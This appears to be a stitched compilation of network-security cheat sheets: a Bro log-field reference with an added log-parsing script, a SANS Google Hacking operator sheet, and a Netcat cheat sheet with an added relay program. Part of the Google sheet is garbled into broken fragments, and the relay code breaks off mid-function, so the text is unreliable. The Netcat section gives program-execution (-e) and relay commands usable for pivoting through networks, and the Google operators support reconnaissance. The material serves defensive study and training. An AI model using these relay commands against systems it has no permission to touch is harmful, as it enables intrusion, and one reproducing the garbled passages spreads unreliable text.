In order to promote its wide distribution, this work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (http://creativecommons.org/licenses/by-nc-sa/4.0/). We at Broala are committed to helping you understand Bro to the fullest so you can be a monitoring hero.

Field Type Description
ts time Message timestamp, if available (0 otherwise)
level string Message severity (Info, warning, error, etc.)
message string Message text
location string The script location where the event occurred, if available

reporter.log Bro internal errors and warnings


State Meaning

S0 Connection attempt seen, no reply

S1 Connection established, not terminated (0 byte counts)

SF Normal establish & termination (>0 byte counts)

REJ Connection attempt rejected

S2 Established, ORIG attempts close, no reply from RESP.

S3 Established, RESP attempts close, no reply from ORIG.

RSTO Established, ORIG aborted (RST)

RSTR Established, RESP aborted (RST)

RSTOS0 ORIG sent SYN then RST; no RESP SYN-ACK

RSTRH RESP sent SYN-ACK then RST; no ORIG SYN

SH ORIG sent SYN then FIN; no RESP SYN-ACK (“half-open”)

SHR RESP sent SYN-ACK then FIN; no ORIG SYN

OTH No SYN, not closed. Midstream traffic. Partial connection.

conn.log: conn_state

Field Type Description

ts time Measurement timestamp

ts_delta interval Time difference from previous measurement

peer string Name of the Bro instance reporting loss

gaps count ACKs seen without seeing data being ACKed

acks count Total number of TCP ACKs

percent_loss string gaps/acks, as a percentage. Estimate of loss.

capture_loss.log

Estimate of packet loss

Field Type Description

ts time Timestamp of the DNS request

uid string Unique id of the connection

id record ID record with orig/resp host/port. See conn.log

proto proto Protocol of DNS transaction – TCP or UDP

trans_id count 16 bit identifier assigned by DNS client; responses match

query string Domain name subject of the query

qclass count Value specifying the query class

qclass_name string Descriptive name of the query class (e.g. C_INTERNET)

qtype count Value specifying the query type

qtype_name string Name of the query type (e.g. A, AAAA, PTR)

rcode count Response code value in the DNS response

rcode_name string Descriptive name of the response code (e.g. NOERROR, NXDOMAIN)

QR bool Was this a query or a response? T = response, F = query

AA bool Authoritative Answer. T = server is authoritative for query

TC bool Truncation. T = message was truncated

RD bool Recursion Desired. T = request recursive lookup of query

RA bool Recursion Available. T = server supports recursive queries

Z count Reserved field, should be zero in all queries & responses

answers vector List of resource descriptions in answer to the query

TTLs vector Caching intervals of the answers

rejected bool Whether the DNS query was rejected by the server

dns.log

DNS query/response details

Field Type Description

ts time Timestamp

uid string Unique ID of Connection

id.orig_h addr Originating endpoint’s IP address (AKA ORIG)

id.orig_p port Originating endpoint’s TCP/UDP port (or ICMP code)

id.resp_h addr Responding endpoint’s IP address (AKA RESP)

id.resp_p port Responding endpoint’s TCP/UDP port (or ICMP code)

proto transport_proto Transport layer protocol of connection

service string Dynamically detected application protocol, if any

duration interval Time of last packet seen – time of first packet seen

orig_bytes count Originator payload bytes; from sequence numbers if TCP

resp_bytes count Responder payload bytes; from sequence numbers if TCP

conn_state string Connection state (see conn.log:conn_state table)

local_orig bool If conn originated locally T; if remotely F. If Site::local_nets empty, always unset.

missed_bytes count Number of missing bytes in content gaps

history string Connection state history (see conn.log:history table)

orig_pkts count Number of ORIG packets

orig_ip_bytes count Number of ORIG IP bytes (via IP total_length header field)

resp_pkts count Number of RESP packets

resp_ip_bytes count Number of RESP IP bytes (via IP total_length header field)

tunnel_parents set If tunneled, connection UID of encapsulating parent(s)

orig_cc string ORIG GeoIP Country Code

resp_cc string RESP GeoIP Country Code

conn.log

IP, TCP, UDP and ICMP connection details

Letter Meaning

S a SYN without the ACK bit set

H a SYN-ACK (“handshake”)

A a pure ACK

D packet with payload (“data”)

F packet with FIN bit set

R packet with RST bit set

C packet with a bad checksum

I Inconsistent packet (Both SYN & RST)

conn.log: history

Orig UPPERCASE, Resp lowercase, uniq-ed
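The conn.log field list and the conn_state and history tables above describe a log format; the following added example (not code from Bro, Broala or Critical Stack) parses a constructed conn.log excerpt by its #fields header, decodes conn_state and history with the meanings the tables give, and tallies unanswered connection attempts per originator, the first thing an analyst checks when hunting for scanning. The sample rows, hosts and UIDs are constructed.

```python
"""Parse Bro conn.log (tab-separated ASCII with a #fields header line) and
decode conn_state and history using the meanings in the tables above.
Added example; not code from Bro, Broala or Critical Stack."""
from collections import defaultdict

# conn_state values, from the conn.log: conn_state table.
CONN_STATE = {
    "S0": "Connection attempt seen, no reply",
    "S1": "Connection established, not terminated",
    "SF": "Normal establishment and termination",
    "REJ": "Connection attempt rejected",
    "S2": "Established, ORIG attempts close, no reply from RESP",
    "S3": "Established, RESP attempts close, no reply from ORIG",
    "RSTO": "Established, ORIG aborted (RST)",
    "RSTR": "Established, RESP aborted (RST)",
    "RSTOS0": "ORIG sent SYN then RST; no RESP SYN-ACK",
    "RSTRH": "RESP sent SYN-ACK then RST; no ORIG SYN",
    "SH": "ORIG sent SYN then FIN; no RESP SYN-ACK (half-open)",
    "SHR": "RESP sent SYN-ACK then FIN; no ORIG SYN",
    "OTH": "No SYN, not closed; midstream traffic",
}
# history letters, from the conn.log: history table; case gives the side.
HISTORY = {
    "S": "SYN without ACK", "H": "SYN-ACK (handshake)", "A": "pure ACK",
    "D": "packet with payload", "F": "FIN", "R": "RST",
    "C": "bad checksum", "I": "inconsistent packet (SYN and RST)",
}
# States in which RESP never completed a handshake with ORIG.
UNANSWERED = {"S0", "REJ", "RSTOS0", "SH"}

# Constructed sample (not captured traffic); the column set is trimmed to
# the fields used here, which a #fields-driven parser handles unchanged.
SAMPLE_LOG = "\n".join([
    "#separator \\x09",
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto"
    "\tservice\tduration\torig_bytes\tresp_bytes\tconn_state\thistory",
    "1400000000.1\tCa1\t10.0.0.5\t51000\t10.0.0.9\t22\ttcp\tssh\t3.2\t1200\t2400\tSF\tShADadFf",
    "1400000001.0\tCb2\t10.0.0.7\t40001\t10.0.0.9\t21\ttcp\t-\t-\t0\t0\tS0\tS",
    "1400000001.1\tCb3\t10.0.0.7\t40002\t10.0.0.9\t23\ttcp\t-\t-\t0\t0\tREJ\tSr",
    "1400000001.2\tCb4\t10.0.0.7\t40003\t10.0.0.9\t80\ttcp\t-\t-\t0\t0\tS0\tS",
    "1400000001.3\tCb5\t10.0.0.7\t40004\t10.0.0.9\t443\ttcp\t-\t-\t0\t0\tRSTOS0\tSR",
    "1400000002.0\tCc6\t10.0.0.8\t53011\t10.0.0.1\t53\tudp\tdns\t0.01\t40\t120\tSF\tDd",
    "1400000003.0\tCd7\t10.0.0.5\t51002\t10.0.0.9\t80\ttcp\thttp\t-\t-\t-\tOTH\tDdA",
])


def parse_conn_log(text):
    """One dict per data row, keyed by the names in the #fields line.
    Bro writes '-' for an unset field and '(empty)' for an empty set;
    both become None so callers can test for absence."""
    fields, rows = None, []
    for line in text.splitlines():
        if not line:
            continue
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
            continue
        if line.startswith("#"):      # #separator, #path, #types, #close
            continue
        if fields is None:
            raise ValueError("data row before #fields header")
        values = line.split("\t")
        if len(values) != len(fields):
            raise ValueError("column count mismatch: %r" % line)
        rows.append({k: (None if v in ("-", "(empty)") else v)
                     for k, v in zip(fields, values)})
    return rows


def describe_history(history):
    """Expand a history string into (side, meaning) pairs: UPPERCASE is
    ORIG, lowercase is RESP, as the history table states."""
    out = []
    for ch in history:
        side = "orig" if ch.isupper() else "resp"
        out.append((side, HISTORY.get(ch.upper(), "unknown letter %r" % ch)))
    return out


def unanswered_by_originator(rows, min_attempts=3):
    """Originators with at least min_attempts connections in an UNANSWERED
    state, plus the distinct responder ports they touched. Many unanswered
    SYNs to many ports from one host is the pattern to check for scanning."""
    counts, ports = defaultdict(int), defaultdict(set)
    for r in rows:
        if r["conn_state"] in UNANSWERED:
            counts[r["id.orig_h"]] += 1
            ports[r["id.orig_h"]].add(int(r["id.resp_p"]))
    return {h: (n, sorted(ports[h])) for h, n in counts.items()
            if n >= min_attempts}


if __name__ == "__main__":
    conns = parse_conn_log(SAMPLE_LOG)
    for c in conns:
        print(c["uid"], c["conn_state"], "=", CONN_STATE[c["conn_state"]])
        print("   history:", describe_history(c["history"]))
    print("unanswered attempts:", unanswered_by_originator(conns))
```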

Bro Logs

Field Type Description

ts time Timestamp of request

uid string Connection unique id

id record ID record with orig/resp host/port. See conn.log

mac string Client’s hardware address

assigned_ip addr Client’s actual assigned IP address

lease_time interval IP address lease time

trans_id count Identifier assigned by the client; responses match

dhcp.log

DHCP lease activity

app_stats.log

Statistics on usage of popular web apps

Field Type Description

ts time Measurement timestamp

ts_delta interval Time difference from previous measurement

app string Name of application (YouTube, Netflix, etc.)

uniq_hosts count Number of unique hosts that used app

hits count Number of visits to app

bytes count Total bytes transferred to/from app

Version: 2.3

www.CriticalStack.com

© 2014 Critical Stack LLC. All rights reserved.

Field Type Description

ts time Timestamp first seen

host addr IP Address of host

known_hosts.log

Observed local active IPs; logged 1xDay

Field Type Description

ts time Timestamp

host addr Host address on which the service is running

port_num port Port number on which the service is running

port_proto transport_proto Transport-layer protocol service uses

service set Set of protocol(s) that match the service’s connection payloads

known_services.log

Observed local services; logged 1xDay

Field Type Description

ts time Timestamp

uid string Connection unique id

id record ID record with orig/resp host/port. See conn.log

fuid string File unique identifier

file_mime_type string Libmagic sniffed file type

file_desc string Additional context for file, if available

proto transport_proto Transport protocol

note string The type of the notice

msg string Human readable message for the notice

sub string Sub-message for the notice

src addr Source address

dst addr Destination address

p port Associated port, if any

n count Associated count or status code

peer_descr string Description for peer that raised this notice

actions set Actions applied to this notice

suppress_for interval Length of time dupes should be suppressed

dropped bool If the src IP was blocked

notice.log

Logged notices


Field Type Description

ts time Measurement timestamp

host addr Address that offered the certificate

port_num port If server, port that server listening on

subject string Certificate subject

issuer_subject string Certificate issuer subject

serial string Serial number for the certificate

known_certs.log

Observed local Certs; logged 1xDay

Field Type Description

ts time Timestamp when the message was first seen

uid string Connection unique id

id record ID record with orig/resp host/port. See conn.log

trans_depth count Depth of message transaction if multiple messages transferred

helo string Contents of the HELO header

mailfrom string Contents of the MAIL FROM header

rcptto set Contents of the RCPT TO header

date string Contents of the DATE header

from string Contents of the FROM header

to set Contents of the TO header

reply_to string Contents of the ReplyTo header

msg_id string Contents of the MsgID header

in_reply_to string Contents of the In-Reply-To header

subject string Contents of the Subject header

x_originating_ip addr Contents of the X-Originating-IP header

first_received string Contents of the first Received header

second_received string Contents of the second Received header

last_reply string Last message that the server sent to the client

path vector Message transmission path, extracted from the headers

user_agent string Value of the User-Agent header from the client

tls bool Connection has switched to using TLS

fuids vector File unique IDs seen attached to this message

is_webmail bool Indicates if the message was sent through a webmail interface

smtp.log

SMTP transactions

Field Type Description

ts time Timestamp of request

uid string Connection unique id

id record ID record with orig/resp host/port. See conn.log

func string Function message that was sent

exception string Exception if there was a failure

modbus.log

PLC requests (industrial control)

Field Type Description

ts time Message timestamp

level string Message severity (Info, warning, error, etc.)

message string Message text

location string The script location where the event occurred, if available

reporter.log

Bro internal errors and warnings


Field Type Description

ts time Timestamp of the detection

uid string Unique ID for the connection

id conn_id ID record with orig/resp host/port. See conn.log

username string The username, if present

mac string MAC address, if present

remote_ip addr Remote IP address, if present

connect_info string Connect info, if present

result string Successful or failed authentication

logged bool Whether this has already been logged & ignored

radius.log

Radius authentication details


Field Type Description

ts time Timestamp when the SSL connection was detected

uid string Connection unique id

id record ID record with orig/resp host/port. See conn.log

version string SSL version that the server offered

cipher string SSL cipher suite that the server chose

server_name string Value of the Server Name Indicator SSL extension

session_id string Session ID offered by the client for session resumption

subject string Subject of the X.509 cert offered by the server

issuer_subject string Signer Subject of the cert offered by the server

not_valid_before time NotValidBefore field value from the server cert

not_valid_after time NotValidAfter field value from the server cert

last_alert string Last alert that was seen during the connection

client_subject string Subject of the X.509 cert offered by the client

clnt_issuer_subject string Subject of the signer of the cert offered by the client

cert_hash string MD5 hash of the raw server certificate

validation_status vector Certificate validation for this connection

ssl.log

SSL handshakes (v2.2 only; v2.3 x509.log)


Field Type Description

ts time Timestamp when the SSH connection was detected

uid string Connection unique ID

id record ID record with orig/resp host/port. See conn.log

status string If the login was heuristically guessed to be a “success” or a “failure”.

direction string Outbound or inbound connection

client string Software string from the client

server string Software string from the server

resp_size count Amount of data returned by the server

ssh.log

SSH handshakes


Field Type Description

ts time Timestamp of request

uid string Connection unique id

id record ID record with orig/resp host/port. See conn.log

version count Protocol version of SOCKS

user string Username for proxy, if available

status string Server status for the attempt using proxy

request.host addr Client requested address

request.name string Client requested name

request_p port Client requested port

bound.host addr Server bound address

bound.name string Server bound name

bound_p port Server bound port

socks.log

SOCKS proxy requests

Field Type Description

ts time Timestamp of the detection

host addr IP address running the software

host_p port Port on which the software is running (for servers)

software_type string Type of software (e.g. HTTP::SERVER)

name string Name of the software

version.major count Major version number of the software

version.minor count Minor version number of the software

version.minor2 count Minor subversion number of the software

version.minor3 count Minor update number of the software

version.addl string Additional version string (e.g. beta42)

unparsed_version string The full, unparsed version of the software

software.log

Software identified by the software framework

Field Type Description

ts time Timestamp of match

src_addr addr Host triggering the signature match event

src_port port Host port on which the match occurred

dst_addr addr Host which was sent the matching payload

dst_port port Port which was sent the matching payload

note string Notice associated with the signature event

sig_id string Name of the signature that matched

event_msg string More descriptive message of the event

sub_msg string Extracted payload data or extra message

sig_count count Number of sigs

host_count count Number of hosts

signatures.log

Matches from the signature framework

Field Type Description

ts time Timestamp tunnel was detected

uid string Connection unique id

id conn_id ID record with orig/resp host/port. See conn.log

duration interval Amount of time between first/latest packet in session

version string The version of SNMP being used

community string Community string of the first SNMP packet associated w/ session; v1 & v2c only

get_requests count Number of variable bindings in GetRequest/Next

get_bulk_requests count Number of variable bindings in GetBulkRequest PDU

get_responses count Number of variable bindings in GetResponse/Response PDUs

set_requests count Number of variable bindings in SetRequest PDUs

display_string string System description of the SNMP responder endpoint

up_since time Time the SNMP responder claims it has been up since

snmp.log

SNMP communication

Description

Error / output logging - LogAscii::output_to_stdout = F &redef

stderr.log / stdout.log

Field Type Description

ts time Timestamp when the message was seen

uid string Connection unique id

id record ID record with orig/resp host/port. See conn.log

proto transport_proto

Protocol over which message was seen. Only UDP is currently supported.

facility string Syslog facility for the message

severity string Syslog severity for the message

message string The plain text syslog message

syslog.log

Syslog messages


Log Page Description

app_stats 1 Statistics on usage of popular web apps

capture_loss 1 Estimate of packet loss

cluster Diagnostics for cluster operation

communication Diagnostics for inter-process communications

conn 1 IP, TCP, UDP and ICMP connection details

dhcp 1 DHCP lease activity

dnp3 2 Distributed Network Protocol (industrial control)

dns 1 DNS query/response details

dpd Diagnostics for dynamic protocol detection

files 2 File analysis results

ftp 2 FTP request/reply details

http 2 HTTP request/reply details

intel 2 Hits on indicators from the intel framework

irc 2 IRC communication details

known_certs 3 Observed local SSL certs. Each is logged once/day

known_devices Observed local devices. Each is logged once/day

known_hosts 3 Observed local active IPs. Each is logged once/day

known_services 3 Observed local services. Each is logged once/day

loaded_scripts A list of scripts that were loaded at startup

modbus 3 PLC requests (industrial control)

notice 3 Logged notices

packet_filter Any filters to limit the traffic being analyzed

radius 3 radius authentication details

reporter 3 Internal errors and warnings

signatures 4 Matches from the signatures framework

smtp 3 SMTP transactions

snmp 4 SNMP communication

socks 4 SOCKS proxy requests

software 4 Software identified by the software framework

ssh 4 SSH handshakes

ssl 4 SSL handshakes (v2.2 only; v2.3 x509.log)

stats Diagnostics such as mem usage, packets seen, etc.

stderr / stdout 4 Output logging

syslog 4 Syslog messages

traceroute 5 Hosts running traceroute

tunnel 5 Details of encapsulating tunnels

x509 5 x509 Certificate Analyzer Output

weird 5 Anomalies and protocol violations

Index

Field Type Description

ts time Timestamp of the detection

id String File id of this certificate

certificate. record Certificate details

.version count Version number

.serial string Serial number

.issuer string Certificate issuer

.not_valid_before time Timestamp before when certificate is not valid

.not_valid_after time Timestamp after when certificate is not valid

.key_alg string Name of the key algorithm

.sig_alg string Name of the signature algorithm

.key_type string Key type, if key parseable openssl (rsa, dsa or ec)

.key_length count Key length in bits

.exponent string Exponent, if RSA-certificate

.curve string Curve, if EC-certificate

san. record Subject Alternative Name

.dns string_vec List of DNS entries in the SAN

.uri string_vec List of URI entries in the SAN

.email string_vec List of email entries in the SAN

.ip addr_vec List of IP entries in the SAN

.other_fields bool True if certificate contained other, unrecognized fields

basicconstraints. record Basic constraints extension of the certificate

.ca bool CA flag set?

.path_len count Maximum path length

logcert bool T (present if policy/protocols/ssl/log-hostcerts-only.bro)

x509.log

x509 Certificate Analyzer Output

Field Type Description

ts time Timestamp of message

uid string Connection unique id

id record ID record with orig/resp host/port. See conn.log

name string The name of the weird that occurred

addl string Additional information accompanying the weird, if any

notice bool Indicate if this weird was also turned into a notice

peer string The peer that generated this weird

weird.log

Anomalies and protocol violations

Field Type Description

ts time Timestamp traceroute was detected

src addr Address initiating the traceroute

dst addr Destination address of the traceroute

proto string Protocol used for the traceroute

traceroute.log

Hosts running traceroute

Field Type Description

ts time Timestamp tunnel was detected

uid string Connection unique id

id record ID record with orig/resp host/port. See conn.log

tunnel_type string The type of tunnel (e.g. Teredo, IP)

action string The activity that occurred (discovered, closed)

tunnel.log

Details of encapsulating tunnels


Phone: 202-559-5200

Email: [email protected]

Web: http://www.CriticalStack.com

Git: https://github.com/CriticalStack/

Twitter: @CriticalStack

pgp 0xc255d63501b80df9

Contact Critical Stack


Goog

leHa

ckin

g an

d De

fens

eCh

eat

Shee

tPO

CKET

REFE

REN

CEG

UID

E

SANS

Stay

Shar

p Pro

gram

http

://

ww

w.s

ans.

org

http

://

ww

w.s

ans.

org/

stay

shar

p

©S

AN

S Ins

titu

te 2

006

Pur

pose

This

doc

umen

t ai

ms

to b

e a

quic

k re

fere

nce

outlin

ing

all G

oogl

e op

erat

ors,

the

irm

eani

ng,

and

exam

ples

of

thei

r us

age.

Wha

t to

use

thi

s sh

eet

for

Use

thi

s sh

eet

as a

han

dy r

efer

ence

tha

t ou

tlin

es t

heva

riou

s G

oogl

e se

arch

es t

hat

you

can

perf

orm

. It is

mea

nt t

o su

ppor

t yo

u th

roug

hout

the

Goo

gle

Hac

king

and

Def

ense

cou

rse

and

can

be u

sed

as a

qui

ckre

fere

nce

guid

e an

d re

fres

her

on a

ll G

oogl

e ad

vanc

edop

erat

ors

used

in

this

cou

rse.

The

stu

dent

cou

ld a

lso

use

this

she

et a

s gu

idan

ce in

build

ing

inno

vative

oper

ator

com

bina

tion

s an

d ne

w s

earc

h te

chni

ques

.

This

she

et is

split

int

o th

ese

sect

ions

:

• O

pera

tor

Exa

mpl

es

• A

dvan

ced

Ope

rato

rs

• N

umbe

r S

earc

hing

• C

alcu

lato

r O

pera

tors

• S

earc

h Par

amet

ers

Ref

eren

ces:

http

://w

ww.g

oogl

e.co

m/i

ntl/

en/h

elp/

refin

esea

rch.

htm

lht

tp:/

/joh

nny.

ihac

kstu

ff.c

omht

tp:/

/ww

w.g

oogl

e.co

m/i

ntl/

en/h

elp/

chea

tshe

et.h

tml

Ope

rato

r Exa

mpl

e Fi

nds

Pag

es C

onta

inin

g

sailb

oat

ches

apea

ke b

ayth

e w

ords

sai

lboa

t, C

hesa

peak

e an

dB

ay

sloo

p O

Rya

wl

eith

er t

he w

ord

sloo

por

the

wor

d ya

wl

“To

each

his

ow

n”th

e ex

act

phra

se t

o ea

ch h

is o

wn

viru

s -c

ompu

ter

the

wor

d vi

rus

but

NO

T th

e w

ord

com

pute

r

Sta

r W

ars

Epi

sode

+III

Th

is m

ovie

title

, in

clud

ing

the

rom

annu

mer

al III

~bo

at loa

nlo

an inf

o fo

r bo

th t

he w

ord

boat

and

its

syno

nym

s: c

anoe

, fe

rry,

etc

.

defin

e:sa

rcas

tic

defin

itio

ns o

f th

e w

ord

sarc

asti

cfr

omth

e W

eb

mac

* x

the

wor

ds M

acan

d X

sepa

rate

d by

exac

tly

one

wor

d

I’m

Fee

ling

Luck

y Ta

kes

you

dire

ctly

to

first

web

pag

e(G

oogl

e lin

k)re

turn

ed f

or y

our

quer

y

Ope

rato

r Exa

mpl

esS

earc

h Va

lue

Des

crip

tion

of

Use

in

Par

amet

ers

Goo

gle

Sea

rch

UR

Ls

qth

e se

arch

ter

m

The

sear

ch t

erm

filte

r0

or

1

If f

ilter

is s

et t

o 0,

show

pote

ntia

lly d

uplic

ate

r esu

lts.

as_e

pqa

sear

ch p

hras

e Th

e va

lue

subm

itte

d is

as

anex

act

phra

se.

No

need

to

surr

ound

with

quot

es.

as_f

ti = inc

lude

Th

e fil

e ty

pe ind

icat

ed b

y e

= e

xclu

de

as_f

ilety

peis

inc

lude

d or

ex

clud

ed in

the

sear

ch.

as_f

ilety

pea

file

exte

nsio

n Th

e fil

e ty

pe is

incl

uded

or

excl

uded

in

the

sear

chin

dica

ted

by a

s_ft

.

as_o

cct

any

= a

nyw

here

Fi

nd t

he s

earc

h te

r m

title

= p

age

title

in t

he s

peci

fied

loca

tion

.bo

dy =

tex

t of

pag

e ur

l = in

the

page

UR

L lin

ks =

in

links

to

the

page

as_d

ti =

inc

lude

Th

e si

te o

r do

mai

n in

dica

ted

e = e

xclu

de

by a

s_si

tese

arch

is inc

lude

dor

exc

lude

d in

the

sea

r ch.

as_s

ites

earc

hsi

te o

r do

mai

n Th

e fil

e ty

pe is

incl

uded

or

excl

uded

in

the

sear

chin

dica

ted

by a

s_dt

.

as_q

drm

3 =

thr

ee m

onth

s Lo

cate

pag

es u

pdat

ed w

ith

inm

6 =

six

mon

ths

the

spec

ified

tim

e fr

ame.

y = p

ast

year

Sea

rch

Par

amet

ers

44 52

Page 57: edu.anarcho-copy.org IP - Network/BTCSwGSEnotes.pdf · i TABLE OF CONTENTS SECTION TITLE PAGE Table of Contents - Networking/Blue Team Tools

Google Advanced Operators

Operator | Meaning | What To Type Into Search Box (& Description of Results)
site: | Search only one website | conference site:www.sans.org (Search SANS site for conference info)
[#]…[#] or numrange: | Search within a range of numbers | plasma television $1000...1500 (Search for plasma televisions between $1000 and $1500)
date: | Search only a range of months | hockey date: 3 (Search for hockey references within past 3 months; 6 and 12-month date-restrict options also available)
safesearch: | Exclude adult content | safesearch: sex education (Search for sex education material without returning adult sites)
link: | Linked pages | link:www.sans.org (Find pages that link to the SANS website)
info: | Info about a page | info:www.sans.org (Find information about the SANS website)
related: | Related pages | related:www.stanford.edu (Find websites related to the Stanford website)
intitle: | Searches for strings in the title of the page | intitle:conference (Find pages with "conference" in the page title)
allintitle: | Searches for all strings within the page title | allintitle:conference SANS (Find pages with "conference" and "SANS" in the page title. Doesn't combine well with other operators)
inurl: | Searches for strings in the URL | inurl:conference (Find pages with the string "conference" in the URL)
allinurl: | Searches for all strings within the URL | allinurl:conference SANS (Find pages with "conference" and "SANS" in the URL. Doesn't combine well with other operators)
filetype: or ext: | Searches for files with that file extension | filetype:ppt (Find files with the "ppt" file extension. ".ppt" files are MS PowerPoint files.)
cache: | Display the Google cache of the page | cache:www.sans.org (Show the cached version of the page without performing the search)
phonebook: or rphonebook: or bphonebook: | Display all, residential, or business phone listings | phonebook: Rick Smith MD (Find all phonebook listings for Rick Smith in Maryland. Cannot combine with other searches)
author: | Searches for the author of a newsgroup post | author:Rick (Find all newsgroup postings with "Rick" in the author name or email address. Must be used with a Google Groups search)
insubject: | Search only in the subject of a newsgroup post | insubject: Mac OS X (Find all newsgroup postings with "Mac OS X" in the subject of the newsgroup post. Must be used with a Google Groups search)
define: | Various definitions of the word, phrase, or abbreviation | define: sarcastic (Get the definition of the word sarcastic)
stock: | Get information on a stock | stock: AAPL (Get the stock information for Apple Computer, Inc.)

Number Searching

Number | Description
1Z9999W99999999999 | UPS tracking numbers
999999999999 | FedEx tracking numbers
9999 9999 9999 9999 9999 99 | USPS tracking numbers
AAAAA999A9AA99999 | Vehicle Identification Numbers (VIN)
305214274002 | UPC codes
202 | Telephone area codes
patent 5123123 | Patent numbers (Remember to put the word "patent" before your patent number)
n199ua | FAA airplane registration numbers (An airplane's FAA registration number is typically printed on its tail)
fcc B4Z-34009-PIR | FCC equipment IDs (Remember to put the word "fcc" before the equipment ID)

Calculator Operators

Operator | Meaning | Type Into Search Box
+ | addition | 45 + 39
- | subtraction | 45 - 39
* | multiplication | 45 * 39
/ | division | 45 / 39
% of | percentage of | 45% of 39
^ | raise to a power | 2^5 (2 to the 5th power)


Netcat Cheat Sheet
By Ed Skoudis
POCKET REFERENCE GUIDE
http://www.sans.org

Purpose
This cheat sheet provides various tips for using Netcat on both Linux and Unix, specifically tailored to the SANS 504, 517, and 560 courses. All syntax is designed for the original Netcat versions, released by Hobbit and Weld Pond. The syntax here can be adapted for other Netcats, including ncat, gnu Netcat, and others.

Fundamentals
Fundamental Netcat Client:
$ nc [TargetIPaddr] [port]
Connect to an arbitrary port [port] at IP Address [TargetIPaddr]

Fundamental Netcat Listener:
$ nc -l -p [LocalPort]
Create a Netcat listener on arbitrary local port [LocalPort]

Both the client and listener take input from STDIN and send data received from the network to STDOUT

Netcat Command Flags
$ nc [options] [TargetIPaddr] [port(s)]
The [TargetIPaddr] is simply the other side's IP address or domain name. It is required in client mode of course (because we have to tell the client where to connect), and is optional in listen mode.

-l: Listen mode (default is client mode)
-L: Listen harder (supported only on Windows version of Netcat). This option makes Netcat a persistent listener which starts listening again after a client disconnects
-u: UDP mode (default is TCP)
-p: Local port (In listen mode, this is port listened on. In client mode, this is source port for all packets sent)
-e: Program to execute after connection occurs, connecting STDIN and STDOUT to the program
-n: Don't perform DNS lookups on names of machines on the other side
-z: Zero-I/O mode (Don't send any data, just emit a packet without payload)
-wN: Timeout for connects, waits for N seconds after closure of STDIN. A Netcat client or listener with this option will wait for N seconds to make a connection. If the connection doesn't happen in that time, Netcat stops running.
-v: Be verbose, printing out messages on Standard Error, such as when a connection occurs
-vv: Be very verbose, printing even more details on Standard Error

Netcat Relays on Windows
To start, enter a temporary directory where we will create .bat files:
C:\> cd c:\temp

Listener-to-Client Relay:
C:\> echo nc [TargetIPaddr] [port] > relay.bat
C:\> nc -l -p [LocalPort] -e relay.bat
Create a relay that sends packets from the local port [LocalPort] to a Netcat Client connected to [TargetIPaddr] on port [port]

Listener-to-Listener Relay:
C:\> echo nc -l -p [LocalPort_2] > relay.bat
C:\> nc -l -p [LocalPort_1] -e relay.bat
Create a relay that will send packets from any connection on [LocalPort_1] to any connection on [LocalPort_2]

Client-to-Client Relay:
C:\> echo nc [NextHopIPaddr] [port2] > relay.bat
C:\> nc [PreviousHopIPaddr] [port] -e relay.bat
Create a relay that will send packets from the connection to [PreviousHopIPaddr] on port [port] to a Netcat Client connected to [NextHopIPaddr] on port [port2]


Netcat Relays on Linux
To start, create a FIFO (named pipe) called backpipe:
$ cd /tmp
$ mknod backpipe p

Listener-to-Client Relay:
$ nc -l -p [LocalPort] 0<backpipe | nc [TargetIPaddr] [port] | tee backpipe
Create a relay that sends packets from the local port [LocalPort] to a Netcat client connected to [TargetIPaddr] on port [port]

Listener-to-Listener Relay:
$ nc -l -p [LocalPort_1] 0<backpipe | nc -l -p [LocalPort_2] | tee backpipe
Create a relay that sends packets from any connection on [LocalPort_1] to any connection on [LocalPort_2]

Client-to-Client Relay:
$ nc [PreviousHopIPaddr] [port] 0<backpipe | nc [NextHopIPaddr] [port2] | tee backpipe
Create a relay that sends packets from the connection to [PreviousHopIPaddr] on port [port] to a Netcat client connected to [NextHopIPaddr] on port [port2]
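Each relay shape above (and its Windows .bat counterpart) is two nc processes glued together: the pipe carries one direction, and the backpipe FIFO plus tee carries the reply back into the first nc's stdin. The program below is an added example, not part of the cheat sheet, that does the same job in one Python process so both data directions are explicit: one pump thread per direction, with a half-close when a side reaches EOF, which is what the pipe and FIFO give the two nc's. The echo service, the port numbers (chosen by the OS) and the messages are constructed for the demo and everything stays on 127.0.0.1.

```python
import socket
import threading


def _pump(src, dst):
    """Copy bytes from src to dst until src hits EOF, then half-close dst so the
    far side sees EOF too (the role of the pipe / backpipe FIFO between two nc's)."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def relay_pair(a, b):
    """Shuttle traffic both ways between two connected sockets; returns when both directions are done."""
    threads = [threading.Thread(target=_pump, args=(a, b), daemon=True),
               threading.Thread(target=_pump, args=(b, a), daemon=True)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    a.close()
    b.close()


def _listen(port):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))  # port 0: let the OS pick one (demo convenience)
    srv.listen(1)
    return srv


def listener_to_client_relay(local_port, target_host, target_port):
    """nc -l -p [LocalPort] 0<backpipe | nc [TargetIPaddr] [port] | tee backpipe
    Accept one inbound client, connect onward to the target, join the two. Returns the bound port."""
    srv = _listen(local_port)
    bound = srv.getsockname()[1]

    def serve():
        inbound, _ = srv.accept()
        srv.close()
        outbound = socket.create_connection((target_host, target_port))
        relay_pair(inbound, outbound)

    threading.Thread(target=serve, daemon=True).start()
    return bound


def listener_to_listener_relay(port1=0, port2=0):
    """nc -l -p [LocalPort_1] 0<backpipe | nc -l -p [LocalPort_2] | tee backpipe
    Wait for a client on each port, then join them. Returns (bound_port1, bound_port2)."""
    s1, s2 = _listen(port1), _listen(port2)
    bound = (s1.getsockname()[1], s2.getsockname()[1])

    def serve():
        c1, _ = s1.accept()
        c2, _ = s2.accept()
        s1.close()
        s2.close()
        relay_pair(c1, c2)

    threading.Thread(target=serve, daemon=True).start()
    return bound


def _recv_all(sock):
    chunks = []
    while True:
        data = sock.recv(4096)
        if not data:
            return b"".join(chunks)
        chunks.append(data)


def start_echo_server():
    """Constructed stand-in for the real [TargetIPaddr]:[port] service: echoes one connection back."""
    srv = _listen(0)
    port = srv.getsockname()[1]

    def run():
        conn, _ = srv.accept()
        srv.close()
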